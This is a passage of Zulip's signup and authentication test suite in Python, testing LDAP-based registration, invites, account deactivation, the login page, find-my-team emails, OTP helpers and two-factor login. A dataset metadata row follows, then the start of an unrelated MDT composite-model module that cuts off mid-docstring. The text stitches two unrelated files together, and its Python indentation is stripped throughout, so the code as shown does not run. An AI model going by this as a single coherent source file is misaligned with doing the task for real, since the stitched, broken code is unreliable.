self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# For the rest of the test we delete the user from ldap.
del self.mock_ldap.directory["uid=newuser,ou=users,dc=zulip,dc=com"]
# If the user's email is not in the LDAP directory, but fits LDAP_APPEND_DOMAIN,
# we refuse to create the account.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because emails matching LDAP_APPEND_DOMAIN,
# aren't allowed to create non-ldap accounts.
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# If the email is outside of LDAP_APPEND_DOMAIN, we successfully create a non-ldap account,
# with the password managed in the zulip database.
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='example.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with patch('zerver.views.registration.logging.warning') as mock_warning:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
mock_warning.assert_called_once_with(
"New account email %s could not be found in LDAP",
"newuser@zulip.com",
)
result = self.submit_reg_form_for_user(email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, 'Non-LDAP Full Name')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_email_search(self) -> None:
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
password = "nonldappassword"
email = "newuser_email@zulip.com" # belongs to user uid=newuser_with_email in the test directory
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR='mail',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
self.assertEqual(result.url, "/accounts/login/?email=newuser_email%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# If the user's email is not in the LDAP directory , though, we
# successfully create an account with a password in the Zulip
# database.
password = "nonldappassword"
email = "nonexistent@zulip.com"
subdomain = "zulip"
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR='mail',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with patch('zerver.views.registration.logging.warning') as mock_warning:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
mock_warning.assert_called_once_with(
"New account email %s could not be found in LDAP",
"nonexistent@zulip.com",
)
result = self.submit_reg_form_for_user(email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, 'Non-LDAP Full Name')
def ldap_invite_and_signup_as(self, invite_as: int, streams: Sequence[str] = ['Denmark']) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn'}
subdomain = 'zulip'
email = 'newuser@zulip.com'
password = self.ldap_password("newuser")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Invite user.
self.login('iago')
response = self.invite(invitee_emails='newuser@zulip.com',
stream_names=streams,
invite_as=invite_as)
self.assert_json_success(response)
self.logout()
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend'))
def test_ldap_invite_user_as_admin(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['REALM_ADMIN'])
user_profile = UserProfile.objects.get(
delivery_email=self.nonreg_email('newuser'))
self.assertTrue(user_profile.is_realm_admin)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend'))
def test_ldap_invite_user_as_guest(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['GUEST_USER'])
user_profile = UserProfile.objects.get(
delivery_email=self.nonreg_email('newuser'))
self.assertTrue(user_profile.is_guest)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend'))
def test_ldap_invite_streams(self) -> None:
stream_name = 'Rome'
realm = get_realm('zulip')
stream = get_stream(stream_name, realm)
default_streams = get_default_streams_for_realm(realm)
default_streams_name = [stream.name for stream in default_streams]
self.assertNotIn(stream_name, default_streams_name)
# Invite user.
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['REALM_ADMIN'], streams=[stream_name])
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email('newuser'))
self.assertTrue(user_profile.is_realm_admin)
sub = get_stream_subscriptions_for_user(user_profile).filter(recipient__type_id=stream.id)
self.assertEqual(len(sub), 1)
def test_registration_when_name_changes_are_disabled(self) -> None:
"""
Test `name_changes_disabled` when we are not running under LDAP.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
full_name="New Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# 'New Name' comes from POST data; not from LDAP session.
self.assertEqual(user_profile.full_name, 'New Name')
def test_realm_creation_through_ldap(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
realm_name = "Zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
TERMS_OF_SERVICE=False,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
key = find_key_by_email(email)
confirmation = Confirmation.objects.get(confirmation_key=key)
prereg_user = confirmation.content_object
prereg_user.realm_creation = True
prereg_user.save()
result = self.submit_reg_form_for_user(email,
password,
realm_name=realm_name,
realm_subdomain=subdomain,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["We just need you to do one last thing.",
"newuser@zulip.com"],
result)
@patch('DNS.dnslookup', return_value=[['sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh']])
def test_registration_of_mirror_dummy_user(self, ignored: Any) -> None:
password = "test"
subdomain = "zephyr"
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.is_active = False
user_profile.save()
result = self.client_post('/register/', {'email': email}, subdomain="zephyr")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"], subdomain="zephyr")
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
result = self.client_get(confirmation_url, subdomain="zephyr")
self.assertEqual(result.status_code, 200)
# If the mirror dummy user is already active, attempting to
# submit the registration form should raise an AssertionError
# (this is an invalid state, so it's a bug we got here):
user_profile.is_active = True
user_profile.save()
with self.assertRaisesRegex(AssertionError, "Mirror dummy user is already active!"):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile.is_active = False
user_profile.save()
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user_profile.id)
def test_registration_of_active_mirror_dummy_user(self) -> None:
"""
Trying to activate an already-active mirror dummy user should
raise an AssertionError.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.is_active = True
user_profile.save()
with self.assertRaisesRegex(AssertionError, "Mirror dummy user is already active!"):
self.client_post('/register/', {'email': email}, subdomain="zephyr")
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration(self) -> None:
"""Verify that /devtools/register_user creates a new user, logs them
in, and redirects to the logged-in app."""
count = UserProfile.objects.count()
email = f"user-{count}@zulip.com"
result = self.client_post('/devtools/register_user/')
user_profile = UserProfile.objects.all().order_by("id").last()
self.assertEqual(result.status_code, 302)
self.assertEqual(user_profile.delivery_email, email)
self.assertEqual(result['Location'], "http://zulip.testserver/")
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration_create_realm(self) -> None:
count = UserProfile.objects.count()
string_id = f"realm-{count}"
result = self.client_post('/devtools/register_realm/')
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].startswith(
f'http://{string_id}.testserver/accounts/login/subdomain'))
result = self.client_get(result["Location"], subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], f'http://{string_id}.testserver')
user_profile = UserProfile.objects.all().order_by("id").last()
self.assert_logged_in_user_id(user_profile.id)
class DeactivateUserTest(ZulipTestCase):
def test_deactivate_user(self) -> None:
user = self.example_user('hamlet')
email = user.email
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
user = self.example_user('hamlet')
self.assertFalse(user.is_active)
password = initial_password(email)
self.assert_login_failure(email, password=password)
def test_do_not_deactivate_final_owner(self) -> None:
user = self.example_user('desdemona')
user_2 = self.example_user('iago')
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_error(result, "Cannot deactivate the only organization owner.")
user = self.example_user('desdemona')
self.assertTrue(user.is_active)
self.assertTrue(user.is_realm_owner)
do_change_user_role(user_2, UserProfile.ROLE_REALM_OWNER)
self.assertTrue(user_2.is_realm_owner)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
do_change_user_role(user, UserProfile.ROLE_REALM_OWNER)
def test_do_not_deactivate_final_user(self) -> None:
realm = get_realm('zulip')
UserProfile.objects.filter(realm=realm).exclude(
role=UserProfile.ROLE_REALM_OWNER).update(is_active=False)
user = self.example_user("desdemona")
self.login_user(user)
result = self.client_delete('/json/users/me')
self.assert_json_error(result, "Cannot deactivate the only user.")
class TestLoginPage(ZulipTestCase):
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_alias(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/')
result = self.client_get("/en/login/?next=/upgrade/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_domain(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/')
result = self.client_get("/en/login/?next=/upgrade/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
mock_get_host.return_value = 'www.testserver.com'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True,
EXTERNAL_HOST='www.testserver.com',
ROOT_SUBDOMAIN_ALIASES=['test']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/')
result = self.client_get("/en/login/?next=/upgrade/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/go/?next=%2Fupgrade%2F')
@patch('django.http.HttpRequest.get_host')
def test_login_page_works_without_subdomains(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
def test_login_page_registration_hint(self) -> None:
response = self.client_get("/login/")
self.assert_not_in_success_response(["Don't have an account yet? You need to be invited to join this organization."], response)
realm = get_realm("zulip")
realm.invite_required = True
realm.save(update_fields=["invite_required"])
response = self.client_get("/login/")
self.assert_in_success_response(["Don't have an account yet? You need to be invited to join this organization."], response)
class TestFindMyTeam(ZulipTestCase):
def test_template(self) -> None:
result = self.client_get('/accounts/find/')
self.assertIn("Find your Zulip accounts", result.content.decode('utf8'))
def test_result(self) -> None:
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,cordelia@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Ccordelia%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn(self.example_email("cordelia"), content)
from django.core.mail import outbox
# 3 = 1 + 2 -- Cordelia gets an email each for the "zulip" and "lear" realms.
self.assertEqual(len(outbox), 3)
def test_find_team_ignore_invalid_email(self) -> None:
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,invalid_email@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn("invalid_email@", content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_reject_invalid_email(self) -> None:
result = self.client_post('/accounts/find/',
dict(emails="invalid_string"))
self.assertEqual(result.status_code, 200)
self.assertIn(b"Enter a valid email", result.content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
# Just for coverage on perhaps-unnecessary validation code.
result = self.client_get('/accounts/find/?emails=invalid')
self.assertEqual(result.status_code, 200)
def test_find_team_zero_emails(self) -> None:
data = {'emails': ''}
result = self.client_post('/accounts/find/', data)
self.assertIn('This field is required', result.content.decode('utf8'))
self.assertEqual(result.status_code, 200)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_one_email(self) -> None:
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_deactivated_user(self) -> None:
do_deactivate_user(self.example_user("hamlet"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_deactivated_realm(self) -> None:
do_deactivate_realm(get_realm("zulip"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_bot_email(self) -> None:
data = {'emails': self.example_email("webhook_bot")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=webhook-bot%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_more_than_ten_emails(self) -> None:
data = {'emails': ','.join([f'hamlet-{i}@zulip.com' for i in range(11)])}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 200)
self.assertIn("Please enter at most 10", result.content.decode('utf8'))
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
class ConfirmationKeyTest(ZulipTestCase):
def test_confirmation_key(self) -> None:
request = MagicMock()
request.session = {
'confirmation_key': {'confirmation_key': 'xyzzy'},
}
result = confirmation_key(request)
self.assert_json_success(result)
self.assert_in_response('xyzzy', result)
class MobileAuthOTPTest(ZulipTestCase):
def test_xor_hex_strings(self) -> None:
self.assertEqual(xor_hex_strings('1237c81ab', '18989fd12'), '0aaf57cb9')
with self.assertRaises(AssertionError):
xor_hex_strings('1', '31')
def test_is_valid_otp(self) -> None:
self.assertEqual(is_valid_otp('1234'), False)
self.assertEqual(is_valid_otp('1234abcd' * 8), True)
self.assertEqual(is_valid_otp('1234abcZ' * 8), False)
def test_ascii_to_hex(self) -> None:
self.assertEqual(ascii_to_hex('ZcdR1234'), '5a63645231323334')
self.assertEqual(hex_to_ascii('5a63645231323334'), 'ZcdR1234')
def test_otp_encrypt_api_key(self) -> None:
api_key = '12ac' * 8
otp = '7be38894' * 8
result = otp_encrypt_api_key(api_key, otp)
self.assertEqual(result, '4ad1e9f7' * 8)
decryped = otp_decrypt_api_key(result, otp)
self.assertEqual(decryped, api_key)
class FollowupEmailTest(ZulipTestCase):
def test_followup_day2_email(self) -> None:
user_profile = self.example_user('hamlet')
# Test date_joined == Sunday
user_profile.date_joined = datetime.datetime(2018, 1, 7, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1))
# Test date_joined == Tuesday
user_profile.date_joined = datetime.datetime(2018, 1, 2, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1))
# Test date_joined == Thursday
user_profile.date_joined = datetime.datetime(2018, 1, 4, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1))
# Test date_joined == Friday
user_profile.date_joined = datetime.datetime(2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=3, hours=-1))
# Time offset of America/Phoenix is -07:00
user_profile.timezone = 'America/Phoenix'
# Test date_joined == Friday in UTC, but Thursday in the user's timezone
user_profile.date_joined = datetime.datetime(2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc)
self.assertEqual(followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1))
class NoReplyEmailTest(ZulipTestCase):
def test_noreply_email_address(self) -> None:
self.assertTrue(re.search(self.TOKENIZED_NOREPLY_REGEX, FromAddress.tokenized_no_reply_address()))
with self.settings(ADD_TOKENS_TO_NOREPLY_ADDRESS=False):
self.assertEqual(FromAddress.tokenized_no_reply_address(), "noreply@testserver")
class TwoFactorAuthTest(ZulipTestCase):
@patch('two_factor.models.totp')
def test_two_factor_login(self, mock_totp: MagicMock) -> None:
token = 123456
email = self.example_email('hamlet')
password = self.ldap_password('hamlet')
user_profile = self.example_user('hamlet')
user_profile.set_password(password)
user_profile.save()
self.create_default_device(user_profile)
def totp(*args: Any, **kwargs: Any) -> int:
return token
mock_totp.side_effect = totp
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',),
TWO_FACTOR_CALL_GATEWAY='two_factor.gateways.fake.Fake',
TWO_FACTOR_SMS_GATEWAY='two_factor.gateways.fake.Fake',
TWO_FACTOR_AUTHENTICATION_ENABLED=True):
first_step_data = {"username": email,
"password": password,
"two_factor_login_view-current_step": "auth"}
result = self.client_post("/accounts/login/", first_step_data)
self.assertEqual(result.status_code, 200)
second_step_data = {"token-otp_token": str(token),
"two_factor_login_view-current_step": "token"}
result = self.client_post("/accounts/login/", second_step_data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zulip.testserver")
# Going to login page should redirect to '/' if user is already
# logged in.
result = self.client_get('/accounts/login/')
self.assertEqual(result["Location"], "http://zulip.testserver")
class NameRestrictionsTest(ZulipTestCase):
def test_whitelisted_disposable_domains(self) -> None:
self.assertFalse(is_disposable_domain('OPayQ.com'))
class RealmRedirectTest(ZulipTestCase):
def test_realm_redirect_without_next_param(self) -> None:
result = self.client_get("/accounts/go/")
self.assert_in_success_response(["Enter your organization's Zulip URL"], result)
result = self.client_post("/accounts/go/", {"subdomain": "zephyr"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zephyr.testserver")
result = self.client_post("/accounts/go/", {"subdomain": "invalid"})
self.assert_in_success_response(["We couldn't find that Zulip organization."], result)
def test_realm_redirect_with_next_param(self) -> None:
result = self.client_get("/accounts/go/?next=billing")
self.assert_in_success_response(["Enter your organization's Zulip URL", 'action="/accounts/go/?next=billing"'], result)
result = self.client_post("/accounts/go/?next=billing", {"subdomain": "lear"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://lear.testserver/billing")
| timabbott/zulip | zerver/tests/test_signup.py | Python | apache-2.0 | 198,704 | [
"VisIt"
] | dad9f124078b596f77d2c2ab2f59581b3d488bec7e51c07ae8566d9f4976a8d7 |
import re
from copy import deepcopy
import numpy as np
import tatsu
from mdt.component_templates.base import ComponentBuilder, ComponentTemplate
from mdt.lib.components import get_component
from mdt.model_building.parameters import FreeParameter, ProtocolParameter
from mdt.models.composite import DMRICompositeModel
from mot.lib.cl_function import CLFunction, SimpleCLFunction
from mdt.model_building.trees import CompartmentModelTree
import collections
from mot.optimize.base import SimpleConstraintFunction
__author__ = 'Robbert Harms'
__date__ = "2017-02-14"
__maintainer__ = "Robbert Harms"
__email__ = "robbert@xkls.nl"
_composite_model_expression_parser = tatsu.compile('''
result = expr;
expr = term ('+'|'-') expr | term;
term = factor ('*'|'/') term | factor;
factor = '(' expr ')' | model;
model = model_name ['(' nickname ')'];
model_name = /[a-zA-Z_]\w*/;
nickname = /[a-zA-Z_]\w*/;
''')
class DMRICompositeModelBuilder(ComponentBuilder):
def _create_class(self, template):
"""Creates classes with as base class DMRICompositeModel
Args:
template (CompositeModelTemplate): the composite model config template
to use for creating the class with the right init settings.
"""
class AutoCreatedDMRICompositeModel(DMRICompositeModel):
def __init__(self, volume_selection=True):
super().__init__(
deepcopy(template.name),
CompartmentModelTree(parse_composite_model_expression(template.model_expression)),
deepcopy(_resolve_likelihood_function(template.likelihood_function)),
signal_noise_model=_resolve_signal_noise_model(template.signal_noise_model),
enforce_weights_sum_to_one=template.enforce_weights_sum_to_one,
volume_selection=volume_selection
)
for full_param_name, value in template.inits.items():
self.init(full_param_name, deepcopy(value))
for full_param_name, value in template.fixes.items():
self.fix(full_param_name, deepcopy(value))
for full_param_name, value in template.lower_bounds.items():
self.set_lower_bound(full_param_name, deepcopy(value))
for full_param_name, value in template.upper_bounds.items():
self.set_upper_bound(full_param_name, deepcopy(value))
self.nmr_parameters_for_bic_calculation = self.get_nmr_parameters()
self._extra_optimization_maps_funcs.extend(_get_model_extra_optimization_maps_funcs(
self._model_functions_info.get_compartment_models()))
self._extra_optimization_maps_funcs.extend(deepcopy(template.extra_optimization_maps))
self._extra_sampling_maps_funcs.extend(_get_model_extra_sampling_maps_funcs(
self._model_functions_info.get_compartment_models()))
self._extra_sampling_maps_funcs.extend(deepcopy(template.extra_sampling_maps))
self._model_priors.extend(_resolve_model_prior(
template.prior, self._model_functions_info.get_model_parameter_list()))
constraint_func = _resolve_constraints(
template.constraints, self._model_functions_info.get_model_parameter_list())
if constraint_func:
self._constraints.append(constraint_func)
self._constraints.extend(_get_compartment_constraints(
self._model_functions_info.get_compartment_models()))
def _get_suitable_volume_indices(self, input_data):
volume_selection = template.volume_selection
if not volume_selection:
return super()._get_suitable_volume_indices(input_data)
protocol_indices = []
for protocol_name, ranges in volume_selection.items():
values = input_data.protocol[protocol_name]
for start, end in ranges:
protocol_indices.extend(np.where((start <= values) * (values <= end))[0])
return np.unique(protocol_indices)
for name, method in template.bound_methods.items():
setattr(AutoCreatedDMRICompositeModel, name, method)
return AutoCreatedDMRICompositeModel
class CompositeModelTemplate(ComponentTemplate):
"""The composite model config to inherit from.
These configs are loaded on the fly by the DMRICompositeModelBuilder
Attributes:
name (str): the name of the model, defaults to the class name
description (str): model description
extra_optimization_maps (list): a list of functions to return extra information maps based on a point estimate.
This is called after after the model calculated uncertainties based on the Fisher Information Matrix.
Therefore, these routines can propagate uncertainties in the estimates.
These functions should accept as single argument an object of type
:class:`mdt.models.composite.ExtraOptimizationMapsInfo`.
Examples::
extra_optimization_maps = [lambda d: {'FS': 1 - d['w_ball.w']},
lambda d: {'Kurtosis.MK': <...>},
lambda d: {'Power2': d['foo']**2, 'Power3': d['foo']**3},
...]
extra_sampling_maps (list): a list of functions to return additional maps as results from sample.
This is called after sample with as argument a dictionary containing the sample results and
the values of the fixed parameters.
Examples::
extra_sampling_maps = [lambda d: {'FS': np.mean(d['w_stick0.w'], axis=1),
'FS.std': np.std(d['w_stick0.w'], axis=1)}
...]
model_expression (str): the model expression. For the syntax see:
mdt.models.parsers.CompositeModelExpression.ebnf
likelihood_function (:class:`mdt.model_building.likelihood_functions.LikelihoodFunction` or str): the
likelihood function to use during optimization, can also can be a string with one of
'Gaussian', 'OffsetGaussian' or 'Rician'
signal_noise_model (SignalNoiseModel): optional signal noise decorator
inits (dict): indicating the initialization values for the parameters. Example:
.. code-block:: python
inits = {'Stick.theta': np.pi}
fixes (dict): indicating the constant value for the given parameters. Example:
.. code-block:: python
fixes = {'Ball.d': 3.0e-9,
'NODDI_EC.kappa': SimpleAssignment('NODDI_IC.kappa'),
'NODDI_EC.theta': 'NODDI_IC.theta'}
Next to values, this also accepts strings as dependencies (or dependecy objects directly).
upper_bounds (dict): indicating the upper bounds for the given parameters. Example:
.. code-block:: python
upper_bounds = {'Stick.theta': pi}
lower_bounds (dict): indicating the lower bounds for the given parameters. Example:
.. code-block:: python
lower_bounds = {'Stick.theta': 0}
